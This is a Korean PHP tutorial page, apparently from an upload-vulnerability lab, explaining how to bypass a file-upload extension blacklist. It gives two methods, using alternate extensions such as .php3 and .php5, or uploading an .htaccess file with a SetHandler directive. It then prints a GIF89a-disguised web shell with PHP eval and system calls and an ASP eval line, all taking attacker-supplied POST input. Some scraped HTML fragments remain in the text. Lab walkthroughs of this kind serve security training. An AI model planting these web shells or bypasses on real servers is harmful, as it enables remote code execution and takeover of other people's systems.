>백엔드 개발 >PHP 튜토리얼 >파일 업로드 시 블랙리스트를 우회하는 방법

파일 업로드 시 블랙리스트를 우회하는 방법

不言
不言원래의
2018-07-05 14:13:106175검색

이 글에서는 주로 파일 업로드를 통해 블랙리스트를 우회하는 방법을 소개합니다. 이제 특정 참조 가치가 있어 공유합니다. 도움이 필요한 친구들이 참고할 수 있습니다.

이 레벨은 주로 업로드 접미사를 설정하고, asp, php, jsp 등의 접미사는 업로드할 수 없습니다.

위치 1: 이 우회 방법은 접미사를 .php3, php5 등으로 수정하는 것입니다. 여기에 블랙리스트 확인('.asp', '.aspx', '.php', '.jsp')이 있습니다. php3, php5... 및 서버에서 구문 분석할 수 있는 기타 접미사 이름을 업로드하세요

위치 2: 우회하도록 파일 구문 분석 규칙을 다시 작성

1. 먼저 다음 내용을 포함하는 .htaccess이라는 파일을 업로드하세요. :

7dbec1342203bda950e5c4d4c26c928b

SetHandler application/x-httpd-php

d4f50085796fcbc8b99545763f01d848

2. 스크립트

내용:

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>

<span style='margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important'><br>最后查看结果如下:<br><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""><br></span>

이상이 이 글의 전체 내용입니다. 더 많은 관련 내용을 보시려면 PHP 중국어 웹사이트를 주목해주세요!

관련 권장 사항:

PHP는 Azure Storage Blob을 사용하여 파일을 업로드합니다

nginx memcache 캐시 소개

위 내용은 파일 업로드 시 블랙리스트를 우회하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
이전 기사:PHP 배경 주석 구현다음 기사:PHP 배경 주석 구현